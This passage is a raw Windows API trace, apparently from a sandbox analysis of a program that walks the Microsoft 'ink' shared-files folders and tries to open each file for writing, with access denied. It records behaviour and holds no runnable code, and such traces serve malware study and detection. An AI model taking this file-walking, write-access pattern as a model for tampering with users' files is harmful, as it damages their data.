hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d9a0 | out: hHeap=0x20000) returned 1 [0085.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0085.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0085.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0085.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0085.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0085.040] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076b52b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0085.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0085.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0085.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0085.040] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78c50 [0085.041] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076afd8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.041] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="chstic.dgml", cAlternateFileName="")) returned 1 [0085.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0085.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0085.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0085.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0085.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0085.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0085.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0085.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0085.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0085.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x80a30 [0085.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0085.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0085.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.042] AreFileApisANSI () returned 1 [0085.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml", lpUsedDefaultChar=0x0) returned 77 [0085.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6dc60 [0085.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0085.043] AreFileApisANSI () returned 1 [0085.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0085.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x50cf8 [0085.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x50cf8, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml") returned 77 [0085.043] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.043] GetFileType (hFile=0x424) returned 0x1 [0085.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.043] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.043] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.043] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.044] CloseHandle (hObject=0x424) returned 1 [0085.044] AreFileApisANSI () returned 1 [0085.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0085.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x50cf8 [0085.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x50cf8, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml") returned 77 [0085.044] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.044] GetLastError () returned 0x5 [0085.044] GetLastError () returned 0x5 [0085.044] SetLastError (dwErrCode=0x5) [0085.044] GetLastError () returned 0x5 [0085.044] SetLastError (dwErrCode=0x5) [0085.044] GetLastError () returned 0x5 [0085.044] SetLastError (dwErrCode=0x5) [0085.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0085.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dc60 | out: hHeap=0x20000) returned 1 [0085.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.044] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x98, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x60090, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x98, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓˻")) returned 0 [0085.045] FindClose (in: hFindFile=0x78c50 | out: hFindFile=0x78c50) returned 1 [0085.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0085.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0085.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0085.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0085.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0085.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0085.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0085.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0085.045] AreFileApisANSI () returned 1 [0085.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT", lpUsedDefaultChar=0x0) returned 57 [0085.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0085.046] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.046] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0085.046] AreFileApisANSI () returned 1 [0085.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0085.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT") returned 57 [0085.046] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.046] GetLastError () returned 0x5 [0085.046] GetLastError () returned 0x5 [0085.046] SetLastError (dwErrCode=0x5) [0085.046] GetLastError () returned 0x5 [0085.046] SetLastError (dwErrCode=0x5) [0085.046] GetLastError () returned 0x5 [0085.046] SetLastError (dwErrCode=0x5) [0085.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0085.046] AreFileApisANSI () returned 1 [0085.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0085.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT") returned 57 [0085.047] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.047] GetLastError () returned 0x5 [0085.047] GetLastError () returned 0x5 [0085.047] SetLastError (dwErrCode=0x5) [0085.047] GetLastError () returned 0x5 [0085.047] SetLastError (dwErrCode=0x5) [0085.047] GetLastError () returned 0x5 [0085.047] SetLastError (dwErrCode=0x5) [0085.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0085.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0085.047] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.047] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.047] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.047] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0085.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0085.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0085.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0085.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0085.047] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076ba6e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0085.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0085.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0085.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0085.047] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78c50 [0085.048] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076b52b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.048] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0085.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0085.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0085.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0085.048] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.048] RtlAllocateHeap 